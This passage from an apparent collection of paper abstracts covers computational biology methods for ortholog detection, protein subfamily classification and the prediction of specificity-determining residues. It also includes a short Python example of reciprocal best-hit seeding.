automatic method for finding orthologs and in-paralogs from two species.
Ortholog clusters are seeded with a two-way best pairwise match, after which an algorithm for adding in-paralogs is applied. The method bypasses multiple alignments and phylogenetic trees, which can be slow and error-prone steps in classical ortholog detection. Still, it robustly detects complex orthologous relationships and assigns confidence values for both orthologs and in-paralogs. The program, called INPARANOID, was tested on all completely sequenced eukaryotic genomes. To assess the quality of INPARANOID results, ortholog clusters were generated from a dataset of worm and mammalian transmembrane proteins, and were compared to clusters derived by manual tree-based ortholog detection methods. This study led to the identification with a high degree of confidence of over a dozen novel worm-mammalian ortholog assignments that were previously undetected because of shortcomings of phylogenetic methods. A WWW server that allows searching for orthologs between human and several fully sequenced genomes is installed at http://www.cgb.ki.se/inparanoid/. This is the first comprehensive resource with orthologs of all fully sequenced eukaryotic genomes. Programs and tables of orthology assignments are available from the same location. --- paper_title: Automated hierarchical classification of protein domain subfamilies based on functionally-divergent residue signatures paper_content: Background: The NCBI Conserved Domain Database (CDD) consists of a collection of multiple sequence alignments of protein domains that are at various stages of being manually curated into evolutionary hierarchies based on conserved and divergent sequence and structural features. These domain models are annotated to provide insights into the relationships between sequence, structure and function via web-based BLAST searches. Results: Here we automate the generation of conserved domain (CD) hierarchies using a combination of heuristic and Markov chain Monte Carlo (MCMC) sampling procedures and starting from a (typically very large) multiple sequence alignment. This procedure relies on statistical criteria to define each hierarchy based on the conserved and divergent sequence patterns associated with protein functional-specialization. At the same time this facilitates the sequence and structural annotation of residues that are functionally important. These statistical criteria also provide a means to objectively assess the quality of CD hierarchies, a non-trivial task considering that the protein subgroups are often very distantly related--a situation in which standard phylogenetic methods can be unreliable. Our aim here is to automatically generate (typically sub-optimal) hierarchies that, based on statistical criteria and visual comparisons, are comparable to manually curated hierarchies; this serves as the first step toward the ultimate goal of obtaining optimal hierarchical classifications. A plot of runtimes for the most time-intensive (non-parallelizable) part of the algorithm indicates a nearly linear time complexity so that, even for the extremely large Rossmann fold protein class, results were obtained in about a day. Conclusions: This approach automates the rapid creation of protein domain hierarchies and thus will eliminate one of the most time consuming aspects of conserved domain database curation. At the same time, it also facilitates protein domain annotation by identifying those pattern residues that most distinguish each protein domain subgroup from other related subgroups.
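The INPARANOID entry above seeds ortholog clusters with two-way best pairwise matches before adding in-paralogs. The snippet below sketches only that seeding step (reciprocal best hits) over a hypothetical score dictionary; the in-paralog expansion and confidence values of the published method are not reproduced, and the gene names and scores are invented for the example.

```python
def reciprocal_best_hits(scores):
    """Seed ortholog pairs from two-way best pairwise matches.

    `scores` maps (gene_in_A, gene_in_B) -> similarity score; a pair is kept
    when each gene is the other's highest-scoring partner, mirroring the
    seeding step described for INPARANOID-style clustering."""
    best_a, best_b = {}, {}
    for (a, b), s in scores.items():
        if s > best_a.get(a, (None, float("-inf")))[1]:
            best_a[a] = (b, s)
        if s > best_b.get(b, (None, float("-inf")))[1]:
            best_b[b] = (a, s)
    return sorted((a, b) for a, (b, _) in best_a.items() if best_b[b][0] == a)

# Hypothetical similarity scores (e.g. BLAST bit scores) between two small proteomes.
scores = {
    ("a1", "b1"): 250.0, ("a1", "b2"): 90.0,
    ("a2", "b1"): 80.0,  ("a2", "b2"): 300.0,
    ("a3", "b2"): 120.0,
}
print(reciprocal_best_hits(scores))  # [('a1', 'b1'), ('a2', 'b2')]
```

Here a3 is not paired because its best partner b2 prefers a2; in INPARANOID-style clustering such sequences may later be attached to a seed pair as in-paralogs rather than discarded.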
--- paper_title: An Introduction to Variable and Feature Selection paper_content: Variable and feature selection have become the focus of much research in areas of application for which datasets with tens or hundreds of thousands of variables are available. These areas include text processing of internet documents, gene expression array analysis, and combinatorial chemistry. The objective of variable selection is three-fold: improving the prediction performance of the predictors, providing faster and more cost-effective predictors, and providing a better understanding of the underlying process that generated the data. The contributions of this special issue cover a wide range of aspects of such problems: providing a better definition of the objective function, feature construction, feature ranking, multivariate feature selection, efficient search methods, and feature validity assessment methods. --- paper_title: Combining specificity determining and conserved residues improves functional site prediction paper_content: Background: Predicting the location of functionally important sites from protein sequence and/or structure is a long-standing problem in computational biology. Most current approaches make use of sequence conservation, assuming that amino acid residues conserved within a protein family are most likely to be functionally important. Most often these approaches do not consider many residues that act to define specific sub-functions within a family, or they make no distinction between residues important for function and those more relevant for maintaining structure (e.g. in the hydrophobic core). Many protein families bind and/or act on a variety of ligands, meaning that conserved residues often only bind a common ligand sub-structure or perform general catalytic activities. Results: Here we present a novel method for functional site prediction based on identification of conserved positions, as well as those responsible for determining ligand specificity. We define Specificity-Determining Positions (SDPs) as those occupied by conserved residues within sub-groups of proteins in a family having a common specificity, but differ between groups, and are thus likely to account for specific recognition events. We benchmark the approach on enzyme families of known 3D structure with bound substrates, and find that in nearly all families residues predicted by SDPsite are in contact with the bound substrate, and that the addition of SDPs significantly improves functional site prediction accuracy. We apply SDPsite to various families of proteins containing known three-dimensional structures, but lacking clear functional annotations, and discuss several illustrative examples. Conclusion: The results suggest a better means to predict functional details for the thousands of protein structures determined prior to a clear understanding of molecular function. --- paper_title: Sequence comparison by sequence harmony identifies subtype-specific functional sites paper_content: Multiple sequence alignments are often used to reveal functionally important residues within a protein family. They can be particularly useful for the identification of key residues that determine functional differences between protein subfamilies. We present a new entropy-based method, Sequence Harmony (SH) that accurately detects subfamily-specific positions from a multiple sequence alignment.
The SH algorithm implements a novel formula, able to score compositional differences between subfamilies, without imposing conservation, in a simple manner on an intuitive scale. We compare our method with the most important published methods, i.e. AMAS, TreeDet and SDP-pred, using three well-studied protein families: the receptor-binding domain (MH2) of the Smad family of transcription factors, the Ras-superfamily of small GTPases and the MIP-family of integral membrane transporters. We demonstrate that SH accurately selects known functional sites with higher coverage than the other methods for these test-cases. This shows that compositional differences between protein subfamilies provide sufficient basis for identification of functional sites. In addition, SH selects a number of sites of unknown function that could be interesting candidates for further experimental investigation. --- paper_title: SDPpred: a tool for prediction of amino acid residues that determine differences in functional specificity of homologous proteins. paper_content: SDPpred (Specificity Determining Position prediction) is a tool for prediction of residues in protein sequences that determine the proteins' functional specificity. It is designed for analysis of protein families whose members have biochemically similar but not identical interaction partners (e.g. different substrates for a family of transporters). SDPpred predicts residues that could be responsible for the proteins' choice of their correct interaction partners. The input of SDPpred is a multiple alignment of a protein family divided into a number of specificity groups, within which the interaction partner is believed to be the same. SDPpred does not require information about the secondary or three-dimensional structure of proteins. It produces a set of the alignment positions (specificity determining positions) that determine differences in functional specificity. SDPpred is available at http://math.genebee.msu.ru/~psn/. --- paper_title: In silico discovery of enzyme-substrate specificity-determining residue clusters. paper_content: The binding between an enzyme and its substrate is highly specific, despite the fact that many different enzymes show significant sequence and structure similarity. There must be, then, substrate specificity-determining residues that enable different enzymes to recognize their unique substrates. We reason that a coordinated, not independent, action of both conserved and non-conserved residues determine enzymatic activity and specificity. Here, we present a surface patch ranking (SPR) method for in silico discovery of substrate specificity-determining residue clusters by exploring both sequence conservation and correlated mutations. As case studies we apply SPR to several highly homologous enzymatic protein pairs, such as guanylyl versus adenylyl cyclases, lactate versus malate dehydrogenases, and trypsin versus chymotrypsin. Without using experimental data, we predict several single and multi-residue clusters that are consistent with previous mutagenesis experimental results. Most single-residue clusters are directly involved in enzyme–substrate interactions, whereas multi-residue clusters are vital for domain–domain and regulator–enzyme interactions, indicating their complementary role in specificity determination. 
These results demonstrate that SPR may help the selection of target residues for mutagenesis experiments and, thus, focus rational drug design, protein engineering, and functional annotation to the relevant regions of a protein. --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Using evolutionary information to find specificity-determining and co-evolving residues. paper_content: Intricate networks of protein interactions rely on the ability of a protein to recognize its targets: other proteins, ligands, and sites on DNA and RNA. To recognize other molecules, it was suggested that a protein uses a small set of specificity-determining residues (SDRs). How can one find these residues in proteins and distinguish them from other functionally important amino acids? A number of bioinformatics methods to predict SDRs have been developed in recent years. These methods use genomic information and multiple sequence alignments to identify positions exhibiting a specific pattern of conservation and variability. The challenge is to delineate the evolutionary pattern of SDRs from that of the active site residues and the residues responsible for formation of the protein's structure. The phylogenetic history of a protein family makes such analysis particularly hard. Here we present two methods for finding the SDRs and the co-evolving residues (CERs) in proteins. We use a Monte Carlo approach for statistical inference, allowing us to reveal specific evolutionary patterns of SDRs and CERs. We apply these methods to study specific recognition in the bacterial two-component system and in the class Ia aminoacyl-tRNA synthetases. Our results agree well with structural information and the experimental analyses of these systems. Our results point at the complex and distinct patterns characteristic of the evolution of specificity in these systems. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. 
paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Multi-RELIEF: a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. Contact: [email protected] Supplementary information: Supplementary data are available at Bioinformatics online. --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis.
Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Automated ortholog inference from phylogenetic trees and calculation of orthology reliability paper_content: Motivation: Orthologous proteins in different species are likely to have similar biochemical function and biological role. When annotating a newly sequenced genome by sequence homology, the most precise and reliable functional information can thus be derived from orthologs in other species. A standard method of finding orthologs is to compare the sequence tree with the species tree. However, since the topology of phylogenetic tree is not always reliable one might get incorrect assignments. Results: Here we present a novel method that resolves this problem by analyzing a set of bootstrap trees instead of the optimal tree. The frequency of orthology assignments in the bootstrap trees can be interpreted as a support value for the possible orthology of the sequences. Our method is efficient enough to analyze data in the scale of whole genomes. It is implemented in Java and calculates orthology support levels for all pairwise combinations of homologous sequences of two species. The method was tested on simulated datasets and on real data of homologous proteins. Availability: Downloadable free of charge from ftp://ftp. cgb.ki.se/pub/prog/orthostrapper/ or on request from the authors. --- paper_title: Combining specificity determining and conserved residues improves functional site prediction paper_content: BackgroundPredicting the location of functionally important sites from protein sequence and/or structure is a long-standing problem in computational biology. Most current approaches make use of sequence conservation, assuming that amino acid residues conserved within a protein family are most likely to be functionally important. Most often these approaches do not consider many residues that act to define specific sub-functions within a family, or they make no distinction between residues important for function and those more relevant for maintaining structure (e.g. in the hydrophobic core). Many protein families bind and/or act on a variety of ligands, meaning that conserved residues often only bind a common ligand sub-structure or perform general catalytic activities.ResultsHere we present a novel method for functional site prediction based on identification of conserved positions, as well as those responsible for determining ligand specificity. We define Specificity-Determining Positions (SDPs), as those occupied by conserved residues within sub-groups of proteins in a family having a common specificity, but differ between groups, and are thus likely to account for specific recognition events. 
We benchmark the approach on enzyme families of known 3D structure with bound substrates, and find that in nearly all families residues predicted by SDPsite are in contact with the bound substrate, and that the addition of SDPs significantly improves functional site prediction accuracy. We apply SDPsite to various families of proteins containing known three-dimensional structures, but lacking clear functional annotations, and discusse several illustrative examples.ConclusionThe results suggest a better means to predict functional details for the thousands of protein structures determined prior to a clear understanding of molecular function. --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. 
Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Ensemble approach to predict specificity determinants: benchmarking and validation paper_content: BackgroundIt is extremely important and challenging to identify the sites that are responsible for functional specification or diversification in protein families. In this study, a rigorous comparative benchmarking protocol was employed to provide a reliable evaluation of methods which predict the specificity determining sites. Subsequently, three best performing methods were applied to identify new potential specificity determining sites through ensemble approach and common agreement of their prediction results.ResultsIt was shown that the analysis of structural characteristics of predicted specificity determining sites might provide the means to validate their prediction accuracy. For example, we found that for smaller distances it holds true that the more reliable the prediction method is, the closer predicted specificity determining sites are to each other and to the ligand.ConclusionWe observed certain similarities of structural features between predicted and actual subsites which might point to their functional relevance. We speculate that majority of the identified potential specificity determining sites might be indirectly involved in specific interactions and could be ideal target for mutagenesis experiments. --- paper_title: Bayesian search of functionally divergent protein subgroups and their function specific residues paper_content: Motivation: The rapid increase in the amount of protein sequence data has created a need for an automated identification of evolutionarily related subgroups from large datasets. The existing methods typically require a priori specification of the number of putative groups, which defines the resolution of the classification solution. ::: ::: Results: We introduce a Bayesian model-based approach to simultaneous identification of evolutionary groups and conserved parts of the protein sequences. The model-based approach provides an intuitive and efficient way of determining the number of groups from the sequence data, in contrast to the ad hoc methods often exploited for similar purposes. Our model recognizes the areas in the sequences that are relevant for the clustering and regards other areas as noise. We have implemented the method using a fast stochastic optimization algorithm which yields a clustering associated with the estimated maximum posterior probability. The method has been shown to have high specificity and sensitivity in simulated and real clustering tasks. With real datasets the method also highlights the residues close to the active site. 
::: ::: Availability: Software 'kPax' is available at http://www.rni.helsinki.fi/jic/softa.html ::: ::: Contact: [email protected] ::: ::: Supplementary information: http://www.rni.helsinki.fi/~jic/softa.html --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: OrthoMCL: identification of ortholog groups for eukaryotic genomes. paper_content: The identification of orthologous groups is useful for genome annotation, studies on gene/protein evolution, comparative genomics, and the identification of taxonomically restricted sequences. Methods successfully exploited for prokaryotic genome analysis have proved difficult to apply to eukaryotes, however, as larger genomes may contain multiple paralogous genes, and sequence information is often incomplete. OrthoMCL provides a scalable method for constructing orthologous groups across multiple eukaryotic taxa, using a Markov Cluster algorithm to group (putative) orthologs and paralogs. This method performs similarly to the INPARANOID algorithm when applied to two genomes, but can be extended to cluster orthologs from multiple species. OrthoMCL clusters are coherent with groups identified by EGO, but improved recognition of "recent" paralogs permits overlapping EGO groups representing the same gene to be merged. Comparison with previously assigned EC annotations suggests a high degree of reliability, implying utility for automated eukaryotic genome annotation. OrthoMCL has been applied to the proteome data set from seven publicly available genomes (human, fly, worm, yeast, Arabidopsis, the malaria parasite Plasmodium falciparum, and Escherichia coli). A Web interface allows queries based on individual genes or user-defined phylogenetic patterns (http://www.cbil.upenn.edu/gene-family). Analysis of clusters incorporating P. falciparum genes identifies numerous enzymes that were incompletely annotated in first-pass annotation of the parasite genome. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. 
SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: RIO: Analyzing proteomes by automated phylogenomics using resampled inference of orthologs paper_content: BACKGROUND ::: When analyzing protein sequences using sequence similarity searches, orthologous sequences (that diverged by speciation) are more reliable predictors of a new protein's function than paralogous sequences (that diverged by gene duplication). The utility of phylogenetic information in high-throughput genome annotation ("phylogenomics") is widely recognized, but existing approaches are either manual or not explicitly based on phylogenetic trees. ::: ::: ::: RESULTS ::: Here we present RIO (Resampled Inference of Orthologs), a procedure for automated phylogenomics using explicit phylogenetic inference. RIO analyses are performed over bootstrap resampled phylogenetic trees to estimate the reliability of orthology assignments. We also introduce supplementary concepts that are helpful for functional inference. RIO has been implemented as Perl pipeline connecting several C and Java programs. It is available at http://www.genetics.wustl.edu/eddy/forester/. A web server is at http://www.rio.wustl.edu/. RIO was tested on the Arabidopsis thaliana and Caenorhabditis elegans proteomes. ::: ::: ::: CONCLUSION ::: The RIO procedure is particularly useful for the automated detection of first representatives of novel protein subfamilies. We also describe how some orthologies can be misleading for functional inference. --- paper_title: Automated Protein Subfamily Identification and Classification paper_content: Function prediction by homology is widely used to provide preliminary functional annotations for genes for which experimental evidence of function is unavailable or limited. This approach has been shown to be prone to systematic error, including percolation of annotation errors through sequence databases. Phylogenomic analysis avoids these errors in function prediction but has been difficult to automate for high-throughput application. To address this limitation, we present a computationally efficient pipeline for phylogenomic classification of proteins. This pipeline uses the SCI-PHY (Subfamily Classification in Phylogenomics) algorithm for automatic subfamily identification, followed by subfamily hidden Markov model (HMM) construction. A simple and computationally efficient scoring scheme using family and subfamily HMMs enables classification of novel sequences to protein families and subfamilies. Sequences representing entirely novel subfamilies are differentiated from those that can be classified to subfamilies in the input training set using logistic regression. Subfamily HMM parameters are estimated using an information-sharing protocol, enabling subfamilies containing even a single sequence to benefit from conservation patterns defining the family as a whole or in related subfamilies. SCI-PHY subfamilies correspond closely to functional subtypes defined by experts and to conserved clades found by phylogenetic analysis. 
Extensive comparisons of subfamily and family HMM performances show that subfamily HMMs dramatically improve the separation between homologous and non-homologous proteins in sequence database searches. Subfamily HMMs also provide extremely high specificity of classification and can be used to predict entirely novel subtypes. The SCI-PHY Web server at http://phylogenomics.berkeley.edu/SCI-PHY/ allows users to upload a multiple sequence alignment for subfamily identification and subfamily HMM construction. Biologists wishing to provide their own subfamily definitions can do so. Source code is available on the Web page. The Berkeley Phylogenomics Group PhyloFacts resource contains pre-calculated subfamily predictions and subfamily HMMs for more than 40,000 protein families and domains at http://phylogenomics.berkeley.edu/phylofacts/. --- paper_title: Clustering of proximal sequence space for the identification of protein families paper_content: Motivation: The study of sequence space, and the deciphering of the structure of protein families and subfamilies, has up to now been required for work in comparative genomics and for the prediction of protein function. With the emergence of structural proteomics projects, it is becoming increasingly important to be able to select protein targets for structural studies that will appropriately cover the space of protein sequences, functions and genomic distribution. These problems are the motivation for the development of methods for clustering protein sequences and building families of potentially orthologous sequences, such as those proposed here. Results: First we developed a clustering strategy (Ncut algorithm) capable of forming groups of related sequences by assessing their pairwise relationships. The results presented for the ras super-family of proteins are similar to those produced by other clustering methods, but without the need for clustering the full sequence space. The Ncut clusters are then used as the input to a process of reconstruction of groups with equilibrated genomic composition formed by closely-related sequences. The results of applying this technique to the data set used in the construction of the COG database are very similar to those derived by the human experts responsible for this database. Availability: The analysis of different systems, including the COG equivalent 21 genomes are available at http: //www.pdg.cnb.uam.es/GenoClustering.html Contact: [email protected] --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. 
It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Secator: A Program for Inferring Protein Subfamilies from Phylogenetic Trees paper_content: With the huge increase of protein data, an important problem is to estimate, within a large protein family, the number of sensible subsets for subsequent in-depth structural, functional, and evolutionary analyses. To tackle this problem, we developed a new program, Secator, which implements the principle of an ascending hierarchical method using a distance matrix based on a multiple alignment of protein sequences. Dissimilarity values assigned to the nodes of a deduced phylogenetic tree are partitioned by a new stopping rule introduced to automatically determine the significant dissimilarity values. The quality of the clusters obtained by Secator is verified by a separate Jackknife study. The method is demonstrated on 24 large protein families covering a wide spectrum of structural and sequence conservation and its usefulness and accuracy with real biological data is illustrated on two well-studied protein families (the Sm proteins and the nuclear receptors). --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. 
Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: BADASP: predicting functional specificity in protein families using ancestral sequences paper_content: Summary: Burst After Duplication with Ancestral Sequence Predictions (BADASP) is a software package for identifying sites that may confer subfamily-specific biological functions in protein families following functional divergence of duplicated proteins. A given protein phylogeny is grouped into subfamilies based on orthology/paralogy relationships and/or user definitions. Ancestral sequences are then predicted from the sequence alignment and the functional specificity is calculated using variants of the Burst After Duplication method, which tests for radical amino acid substitutions following gene duplications that are subsequently conserved. Statistics are output along with subfamily groupings and ancestral sequences for an easy analysis with other packages. ::: ::: Availability: BADASP is freely available from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ ::: ::: Contact: [email protected] ::: ::: Supplementary information: A manual with further details can be downloaded from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ --- paper_title: Classification of protein families and detection of the determinant residues with an improved self-organizing map paper_content: Using a SOM (self-organizing map) we can classify sequences within a protein family into subgroups that generally correspond to biological subcategories. These maps tend to show sequence similarity as proximity in the map. Combining maps generated at different levels of resolution, the structure of relations in protein families can be captured that could not otherwise be represented in a single map. The underlying representation of maps enables us to retrieve characteristic sequence patterns for individual subgroups of sequences. Such patterns tend to correspond to functionally important regions. We present a modified SOM algorithm that includes a convergence test that dynamically controls the learning parameters to adapt them to the learning set instead of being fixed and externally optimized by trial and error. Given the variability of protein family size and distribution, the addition of this features is necessary. The method is successfully tested with a number of families. The rab family of small GTPases is used to illustrate the performance of the method. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. 
Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. Availability: All computer programs and datasets used in this work are available from the authors for academic use. Contact: [email protected] Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Automatic clustering of orthologs and in-paralogs from pairwise species comparisons paper_content: Orthologs are genes in different species that originate from a single gene in the last common ancestor of these species. Such genes have often retained identical biological roles in the present-day organisms. It is hence important to identify orthologs for transferring functional information between genes in different organisms with a high degree of reliability. For example, orthologs of human proteins are often functionally characterized in model organisms. Unfortunately, orthology analysis between human and e.g. invertebrates is often complex because of large numbers of paralogs within protein families. Paralogs that predate the species split, which we call out-paralogs, can easily be confused with true orthologs. Paralogs that arose after the species split, which we call in-paralogs, however, are bona fide orthologs by definition. Orthologs and in-paralogs are typically detected with phylogenetic methods, but these are slow and difficult to automate. Automatic clustering methods based on two-way best genome-wide matches on the other hand, have so far not separated in-paralogs from out-paralogs effectively. We present a fully automatic method for finding orthologs and in-paralogs from two species. Ortholog clusters are seeded with a two-way best pairwise match, after which an algorithm for adding in-paralogs is applied. The method bypasses multiple alignments and phylogenetic trees, which can be slow and error-prone steps in classical ortholog detection. Still, it robustly detects complex orthologous relationships and assigns confidence values for 